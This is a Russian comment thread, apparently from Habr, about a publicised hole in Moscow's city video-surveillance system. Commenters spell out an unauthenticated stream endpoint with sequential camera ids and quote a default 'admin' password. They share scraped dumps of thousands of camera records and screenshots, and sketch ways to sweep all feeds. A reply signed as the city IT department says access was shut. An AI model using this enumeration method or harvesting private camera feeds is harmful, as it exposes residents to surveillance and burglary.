                  Это я и имел в виду, когда говорил, что законопослушному человеку скрывать нечего. Пусть хоть обследятся.
                  А, что касается публичных личностей, то, по большому счету, за ними и так всегда следят. Фанаты, папарацци и т. д. Одним инструментом больше, одним меньше… И, опять же повторю, если публичная личность не хочет, чтобы, какой-либо неприглядный компромат попал в сеть, пусть держит себя в рамках.

                  На счет гопников и домушников. Не спорю, есть нюансы.
                  Но, как я уже говорил, разумеется во всем этом есть свои минусы и плюсы. И тут уже надо просчитывать все «за» и «против». Мне, все же кажется, что плюсов было бы больше. Но мое мнение, не истина в последней инстанции, и каждый имеет право на свое личное.
  • +1
    Максимальный id=137059 и после него ещё несколько камер на круглых числах.

    Среди камер видел одну явно домофонную, доступ к которой свободный (в рамках подъезда)
    • 0
      штук 5 открыл, 4-е были домофонные.
    • –3
      т.е., грубо округлив, по одной камере на 100 человек населения. пугает меня такая цифра.
      • 0
        а если посчитать кол-во человек, живущих в одном подъезде?
      • 0
        Есть пропуски id-шников. Но всё равно много
  • +9
    Я всегда знал, что в Netris хорошие программисты.
    • +18
      Администраторы системы тоже профи.

      #2350 -archiveSnapshot
      Пароль для доступа (из материала по ссылке выше)
      "password":"admin"
      

      У меня нет слов.
    • 0
      а нетрис ли? Вроде же тут циско.
  • +7
    А нет ни у кого карты, где связь айдишников с адресами есть?
    • 0
      Нужно сделать сервис, где на карте можно выбирать камеры :)
      • 0
        На ВДНХ в павильоне госуслуг слева от катка этот сервис доступен любому желающему
    • +1
      При легальном доступе к сервису видеонаблюдения ЕЦХД камеры показывают на карте. У меня где-то на работе лежит скриншот оттуда, если найду — могу показать. В прошлом году многим сотрудникам ОИВ давали тестовый двухнедельный доступ. Правда, доступ дали не ко всем камерам, и интересующий нашего начальника тип объектов в доступе отсутствовал. Вроде кто-то у нас пытался куда-то обращаться по этому поводу, но без особого толку.
    • +3
      Тут есть некие id — data.mos.ru/datasets/1498. Совпадают ли они с id в URL — вопрос.
  • +63
    Несложно догадаться, что используя следующий URL

    Я стесняюсь спросить, но мне одному сложно догадаться, откуда появилась URL?
    • +26
      В лучших традициях учебников по матану: «Легко заметить, что...»
      • +26
        Скорее физика. Мастер по выражениям «откуда очевидно, что…», «легко заметить, что…» был Ландау.
  • +8
    Реквестую — веб интерфейс со встроенным плеером — лениво копировать урл каждый раз)
    • +3
      http://echd.herokuapp.com/

      Вот, запилил сервис, но пока шлифовал, сервис начали закрывать и серверы перестают отдавать поток.
      • 0
        кликал «мне повезёт» раз 10 ниразу ID не попал выше 1600, потом словил 500-ую ошибку. Хабра эффект, однако.
        • 0
          Похоже, что окончательно закрыли все стриминговые серверы, ни один не отдает потоки.

          Жаль, что прикрыли доступ, получилось бы забавное реалити-шоу.
        • 0
          По поводу «1600» — сначала скачал базу первых 2000 камер, поэтому диапазон был такой.
          Сейчас в базе 60000 камер, но уже не важно :-(
  • +8
    Вешаем на дерево перед камерой своего подъезда яркую цветную бумажку.
    Перебираем все камеры live, сохраняем кадр ffmpeg, программно ищем цвет бумажки.
    PROFIT
    • +2
      А может лучше не бумажку а символ? Мне кажется проблемы будут с поиском цвета из за различных искажений оного. Разный баланс белого, освещенность, матрица, все это повлияет.
      • +13
        QR Code!
        • +1
          на камерах разрешение не ахти — проще уж символ.
  • +4
    json-файлы первых 1000 камер: rghost.ru/60526615
    Выключенные камеры (не найденные) убрал
    • +2
      Вторая порция: rghost.ru/60526814
      • +1
        респект) продолжение бы)
        • 0
          C 1 по 3221 камеру (всего за вычетов неработающих 3193 штуки): rghost.ru/60528249
          Больне не успел, так как упало всё.
  • 0
    Вставляете ссылку вида obmen-video.echd.ru/cameraManager/ajaxGetVideoUrls?id=ХХХ&_=1421929669467 в браузер


    Второй параметр игнорируется, т.е. достаточно просто obmen-video.echd.ru/cameraManager/ajaxGetVideoUrls?id=ХХХ
  • 0
    Закрыли?
    Уронили?
    • 0
      да, упало. успел заграбить 23396 скриншотов.
      • 0
        Камер было много больше — тысяч 160.
        • 0
          ну да, не успел. и 60 тысяч жсонов сграбил.
          • +6
            • –2
              Осторожно, tarbomb
            • 0
              не качается. в двух браузерах жмакаю скачать — и ничего не происходит. чяднт?
              • +1
                У box.com есть лимиты на скачку. Таким образом если ссылка очень популярная, то через некоторе время она скачиваться перестает. Лимиты зависят от размера файла. Через сутки лимит, насколько я знаю, восстанавливается.
              • +2
                перезалил на мегу.
            • 0
              Спасибо!
              Составил плейлист с лайвстримами
              rghost.net/60528330
              • 0
                Оригинальный файл не перезальете?
          • 0
            комментарий удален
        • +1
          у нас всего около 140 тыс. камер ))
  • 0
    плохие подворотни уже
  • НЛО прилетело и опубликовало эту надпись здесь
  • 0
    502 Bad Gateway
    Слегло.
    • 0
      Эхх… надо было пораньше хабр читать. Поделитесь кто-нибудь полным архивом, пожалуйста.
      Раз данные публичные, то публично:)

      Вот в формате mysql, что успел (2331 камер).
      camtype — тип ссылки, по хвостику (например live = 7).

      camtype:
      			unknown - 0
      -archive?rec		echd_archive_rec - 1
      -archiveSnapshot?shot	echd_archive_snapshot_shot - 3
      -archiveSnapshot	echd_archive_snapshot - 2
      -archive?recarchive	echd_archive_recarchive	- 4
      -live?m3u		echd_live_m3u - 5
      -liveSnapshot?shot	echd_livesnapshot_m3u - 6
      -live			echd_live - 7
      
      • 0
        По ссылке вылетает 404:(
        • +2
          Я успел архив по его ссылке скачать, перекачал на rghost.
        • 0
          Извините меня:)
          Я ее снял за неактуальностью, так как здесь выложили в 30 раз больший объем.
          Ну, а теперь и вовсе информация теряет актуальность (ссылки), так как «владельцы» приостановили доступ и сбросили все соли (403 ошибка). А ведь так хотелось найти свой старый двор и посмотреть на снег…
    • –13
      Такса едет на такси.
      Такса едет на такси.
      Такса едет на такси.
      Такса едет на такси.
      Такса едет на такси.
      Такса едет на такси.
      Такса едет на такси.
      Все, приехали. Мерси!
  • +5
    Несанкционированный… В окошко глядеть тоже несанкционированно? ;)
    Зачем вообще закрывать доступ, лучше бы наоборот сделали нормальный интерфейс с картой. Бывает очень удобно, например, посмотреть, есть ли очередь на автомойку.
    • 0
      transport.mos.ru/ вот тут кстати — недавно запущенный портал — есть камеры с перекрестков.
      • 0
        Подскажите, где именно на этом сайте эти камеры?
        • +1
          на карте в правом углу включить геоинформацию
        • 0
          makescreen.ru/i/83380e9506b63601ade82b540295c4.jpg
          Геоинформация → Онлайн-камеры → Выбираете камеру на карте
          • +3
            Да это фигня. С яндекса тянут
            • 0
              Ага. Так рекламировали, а потом оказалось, что все камеры уже на Яндексе давным-давно есть.
  • +7
    есть и хорошие новости! в прошлый раз (2009 год) оказалось, что вместо камер поставили муляжи
    • +58
      Ну, теперь мы знаем, кто автор «Хабрахабра».
  • –1
    Лавочка прикрылась: 502 Bad Gateway
  • –8
    Что-то я пробую, мне говорят 502 Bad Gateway. Что я делаю не так?
    • +33
      Не читаете комментарии к посту
  • +3
    можно подробнее, каким образом получили урл и универсальную соль?
    • +1
      1421929669467 — это не универсальная соль, а unix timestamp.
  • +72
    Всем спасибо за внимание и бурное обсуждение! Доступ к этому сервису мы закрыли еще в районе полудня. Как тут некоторые уже догадались, мы действительно сейчас экспериментируем с тем, чтобы дать доступ к части камер (как в публичных местах, так и в жилых массивах) жителям и сервис проходил закрытое бета-тестирование добровольцами (мы так делаем довольно часто, будем рады всех желающих видеть в числе наших бета-тестров). Доступ собственно был только к просмотру и никак не влиял на безопасность системы, не позволял ни управлять камерами, ни удалять данные. Собственно такой доступ мы вам предоставляем в экспериментальном режиме с 30 декабря вот тут — на каникулах там были доступны трансляции с основых праздничных площадок, потом показывали с городских камер крещенские купания, сейчас можно самые загруженные катки посмотреть. Так что все будет — удобно, интересно и на карте, дайте доделать обязательно все покажем и расскажем. Скептики, кстати, убедились что камеры работают. Их сейчас порядка 140 тыс. Ваш Департамент информационных технологий города Москвы.
    • +2
      Доступ к какого рода камерам предоставят? Конечно интереснее всего смотреть за парковкой перед домом (вход в подъезд).
      Будут ли такие камеры доступны рядовым пользователям?
      • +2
        на самом деле в нескольких районах Москвы уже давно предоставляем тоже в порядке эксперимента жителям возможность смотреть потоки с дворовых и подъездных камер с телевизора (как отдельный канал).
        • 0
          А можно подробнее узнать, какие районы? Как к этому подключится?
          • 0
            этот эксперимент идет в трех округах — ЮЗАО (в Коньково очень хорошее покрытие, остальные районы на разной стадии), СВАО (много районов) и САО (несколько районов). Следите за объявлениями в подъездах, если вы из этих округов. В домах, где это есть, бесплатно меняют запирающее устройство на видеодомофон и устанавливают дополнительную камеру внутри подъезда и вы получаете доступ к трансляции с телевизора. Ежемесячная плата за запирающее устройство остается неизменной, фактически меняется только оператор вашего домофона.
            • 0
              Эх, жаль не СЗАО (Строгино).
              Хотя, видеодомофон и камера в подъезде давно установлены.
            • 0
              С телевизора? И только с телевизора? Веб-трансляция не доступна? Почему?
              • +1
                Питер. По внутреннему антенному кабелю в любой квартире можно посмотреть на 5 камер (вход у улицы, первая лестница внутри под'езда, площадка первого этажа, лифт, площадка последнего этажа).
              • +1
                потому что аналоговый сигнал с камеры подмешивается недорогим прибором в аналоговый сигнал кабельной антенны.

                Никакого отношения к консолидированной системе городских камера _такая_ система не имет.

                Цифра до такого ещё, простите, не доросла. У нас только несколько клиентов подмешивают камеры в видео.
                • 0
                  аналоговый сигнал с камеры подмешивается недорогим прибором в аналоговый сигнал кабельной антенны

                  Может, глупый вопрос, но этот аналоговый сигнал через антенну случайно не транслируется на весь квартал «по воздуху»?
                  • 0
                    нет, оно подмешивается именно в аналоговый сигнал кабеля.
                    • 0
                      … а кабель соединен с антенной. Хотя, вполне возможно, что антенна как раз для передачи неподходящая, и поймать этот сигнал можно лишь на расстоянии ≈30 см.
                • 0
                  Мой вопрос был именно про реализацию в Москве, в ЮЗАО, СВАО и САО, о чем писал leider. Т.к. в Москве уже есть консолидированная система (судя по этому посту), то почему доступ предоставляется лишь через ТВ? Чтоб не создавать систему авторизации, не выдавать логины/пароли и т.п.?
            • 0
              Ясенево попадает в ЮЗАО, как там с покрытием?
              • 0
                В Ясенево тоже делаем, но там пока не слишком активно идет, управа не очень заинтересована, а нам в каждом доме надо собрание жильцов проводить, чтобы домофон сменить.
    • +23
      Вопрос а это так и должно показывать?
      • 0
        Давно делали снимок? У меня не показывает ни одна камера из дампа первых двух тысяч.
      • +7
        Камеры дворового видеонаблюдения (картинка именно с этого типа) — управляемые с 30-кратным оптическим зумом, ими ежедневно пользуются ЖКХшники, правоохранители и другие службы, у которых есть доступ в защищенный контур, каждый «выкручивает», как ему надо, спустя некоторое время камера автоматически возвращается в положение, установленное по умолчанию и остается в нем до тех пор, пока не подключится новых пользователь с расширенными правами
        • 0
          А камеру на скриншоте выше отвернули в стену, что бы скрыть преступление?
      • +46
        Вот эта лучше
        image
        • +74
          очевидно, баг! ;)
        • +26
          — Боцман, что у нас слева по курсу?
          — Шестивёсельная шлюпка, сэр!
          — Боцман, что у нас справа по курсу?
          — Шестивёсельная шлюпка, сэр!
          — Боцман, что у нас прямо по курсу?
          — Шестивёсельная шлюпка, сэр!
          — Боцман, снимите блоху с бинокля!
      • +4
        А эта аналогична вашей
        Заголовок
        image
      • +1
      • +1
        ждут пока графити нарисуют
      • +3
        Проверяют кладку.
      • +5
        У Бэнкси есть работа на эту тему
        image
    • 0
      неужели нетрис ничего поприличнее чем flv стриминг не смог предложить?
      • 0
        для браузеров еще недавно альтернатив не было, вроде
        • –1
          ?????????

          Последние 7 лет вполне себе существует RTMP и внедряется. Последние 4 года есть всякие HLS,HDS в браузерах. Или вы считаете, что в современном интернете 7 лет — это так себе, свежачок совсем?
          • 0
            конечно, сырой свежак, про который не знают ни браузеры пользователей, ни сайтоделы.
  • 0
    Уже и сервера трансляций начали потихоньку отваливаться.
    Третий пока еще работает, а 4ый, 5ый и 6ой уже запрещают подключение.

    Вот первая 1000 картинок с камер: rghost.ru/60529845
  • +2
    Москва пообещала публичный доступ к камерам наблюдения после сообщения о «взломе» meduza.io/news/2015/01/24/moskva-poobeschala-publichnyy-dostup-k-kameram-nablyudeniya-posle-soobscheniya-o-vzlome
  • +4
    В новостях увидел заголовок: «Автор Хабрахабра получил доступ к 20 тысячам камер наблюдения в Москве». Интересно их специально так учат заголовки составлять?
    • +8
      Да.
    • 0
      Это их хлеб. Иной раз прочитаешь заголовок — дрожь берет. Откроешь статью — ересь какая-то =)
  • 0
  • 0
    Ранее в популярном блоге «Хабрхабр» появилось сообщение одного из пользователей о том, что он якобы получил нелегальный доступ к 200 тысячам камер наблюдений


    www.vesti.ru/doc.html?id=2301029
    • +4
      Интернет-пользователи не взламывали столичное видеонаблюдение

      Всё идёт к тому, что скоро будет заголовок «Системы видеонаблюдения взломали интернет-пользователей» :)
    • +3
      «Вести» как всегда решили приукрасить :)
      … появилось сообщение одного из пользователей о том, что он якобы получил нелегальный доступ к 200 тысячам камер ...
      • +4
        якобы
        • +5
          А если немного подкорректировать, то получится правда (ох уж эти сми):
          что он получил якобы нелегальный доступ к 20 тысячам камер

          Хотя, честно говоря, я сомневаюсь, что это действительно был открытый эксперимент, несмотря на то, что ЕЦХД это утверждают.
          • 0
            Почему нет-то? У нас в Казани есть открытый доступ к куче городских камер, есть сайт с картой их расположения, всё официально.
          • НЛО прилетело и опубликовало эту надпись здесь
          • 0
            У нас в Новосибирске тоже есть подобный сервис. Видеокамер конечно не такое количество, но все же.
            Все официально.
            • 0
              А ссылочку можно? А то одни вебки в гугле.
    • +3
      «Хабрхабр» — звучит как заклинание :) Ох уж эти журналисты…
  • –4
    все уже прикрыли

    Админы и Сб не дремлет у них ( Наши налоги Работают )))

    а так спасибо за топик было очень интересно почитать и увидеть!
  • +3
    Может меня кто-нибудь просветить. Каким образом и зачем попали домофонные камеры в «общий» доступ?
    • +8
      Доктор на рентгене.
    • 0
      А почему бы и нет?
  • –6
    Скриншот с одной из камер
    image
    • –5
      чего минусуете то? это отсылка к прекрасному сериалу, который иллюстрирует проблему слежки во всей красе. с теми возможностями, которые раскрыты в этой статье — сюжет вполне может стать реальным.
      • –1
        Я вас вполне поддерживаю!
  • 0
    Если бы я был угонщиком… или домушником… и ещё много кем. Ой пригодилась бы мне подобная штука…
    • +5
      Что мешает припарковать машину и запитать регистратор? Много лучше, чем камеру с крыши или подъездной двери, и угол можно удобный выставить.
      А вот через этот сервис удобно проверить кто и как паркуется, или что поцарапал авто (если сверху вид). Через подъездную камеру — «подозрительных людей», бабулек-то на лавочках (как и самих лавочек) с каждым годом становится все меньше и меньше, безопасность падает.

      0KLQigC/0LwQhvDQggC40LIuINCv0LXRtNC/0LXQiqC40LUh
      
    • +1
      Попробуйте описать правдоподобный сценарий. И помните — у вас одна жизнь в этой игре. )
  • –2
    Спасибо конечно за такой праздник, но имхо все же зря слили в паблик. А так бы хоть лазейка осталась в руках у сообщества. «Следим за ними, как они за нами». :) А вообще не одобряю я все это очень, на самом деле. Мне вот нафиг не надо, чтобы определенный круг лиц обладал сведениями о, например, моем приходе и уходе. Учитывая в какой стране мы живем, этот круг лиц легко может быть расширен до людей непосредственно заинтересованных в данной информации. Насчет открытого доступа. Больше чем уверен, что они не будут этого делать. Ну, а зачем? Не маленькие вроде, думаю сами все прекрасно понимаете.
  • 0
    Всего один крутой пост и вы уже 6й в рейтинге пользователей Хабрахабра спустя двое суток после регистрации! Поздравляю! :)
    • 0
      Так рейтинг таит в теч. недели.
  • 0
    Вообще хорошо бы чтобы эти камеры в принципе были общедоступны, вместе с архивами записей.
  • +1
    Поясните, пожалуйста, как Вы от этого:

    obmen-video.echd.ru/embed/noauth/здесь_много_соли
    Будучи вдумчивым по своей природе, я заглянул в source и обнаружил следующее:
    window.APP_VERSION = '0.1';
    window.BUILD_ID = 'public';
    window.embeddedCamera = {«id»:******,«name»:«MMC_***; такой-то парк»,«shortName»:«MMC_***»,«address»:«такой-то адрес »,«description»:null,«type»:{«id»:4,«color»:«0D0D0D»},«cameraType»:4,«apiType»:«ECHD_CISCO_VSM»,«fixed»:false,«status»:0,«lat»:"***",«lng»:"***"};
    window.Request = {«id»:«4a6a19d5-ab03-4cb1-8fc4-281345c873f5»,«innerId»:"******",«userId»:***,«ttl»:1422353451835}; // Mapped HTTP request (POST/GET params)

    Перешли к этому:

    Несложно догадаться, что используя следующий URL
    obmen-video.echd.ru/cameraManager/ajaxGetVideoUrls?id=666&_=1421929669467
    Я получил следующий набор потоков
  • НЛО прилетело и опубликовало эту надпись здесь
    • +1
      4K камеры снимающие людей ровно в углу композиции)
      • НЛО прилетело и опубликовало эту надпись здесь
    • 0
      Нет, не станут люди передвигаться так чтоб не светится в камерах.
      Вы во вконтакт загляните, что там люди сами про себя постят не стесняясь.

      Те кому очень надо не палится на камерах пользуются гримом, я имею ввиду, давно уже пользуются.

      • НЛО прилетело и опубликовало эту надпись здесь
  • 0
    К слову, в это же время власти Москвы запустили портал «Окно в Город» video.dit.mos.ru/window/ где можно увидеть некоторые камеры в известных местах, такие как каток ВДНХ и Парк Горького.
    «При этом горожане не смогут поворачивать камеру и пользоваться зумом, эти возможности по-прежнему останутся только у правоохранительных органов и городских служб.» — всё как написал автор.
    • +1
      «Окно» мы запустили еще 30 декабря как еще одно направление тестирования. Это событийный сервис. В праздники помимо катков показывали площадки фестиваля «Путешествие в Рождество», ночью с 18 на 19 января показывали несколько площадок крещенских купаний (не так много камер на водоемы смотрят).
      • +1
        Почему нельзя все эти событийные камеры оставить навсегда? На водоём интересно и летом смотреть. Добавить бы их на слой официальных Яндекс.карт — вообще было бы замечательно.
        • 0
          Возможно, трафик через свою систему сделать неограниченным — задачка не простая и не решённая. Думаю, они просто физически не готовы отдавать весь поток всем желающим
          • 0
            это, конечно, правильный вопрос. Но я думаю, что у них пропорция входного к выходному трафику может быть 10:1
    • НЛО прилетело и опубликовало эту надпись здесь
  • +2
    Интересная дырка, хороший анализ и хороший профит
    Хабрахабр всегда и везде на высоте!.
  • 0
    Господа, вот так новость, немного попахивает нафталином из прошлого.
    Более 20 000 камер? маловато будет.
    Новость только локальная — Москва. Никто не слышал про взлом сетей подобных по миру?
    • +1
      А чего их взламывать? По миру куча открытых камер. Да и была где то статья про доступ к приватным камерам по стандартной паре логина и пароля которые не ограничиваются одной страной.

    • +1
  • 0
    Присоединяюсь к мнению автора статьи:
    я пытался связаться с ними по поводу уязвимости, но ответа так и не получил. Надеюсь, после этой публикации ошибку всё же исправят.

    dit@ и dit-video@ молчат, leider тоже молчит.
    • 0
      Что-то обнаружили?
    • 0
      изменили принцип генерации ссылок, ссылки на старые потоки прикрыли, «Окно в город» восстановили, заинтересантам вроде ответили.

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.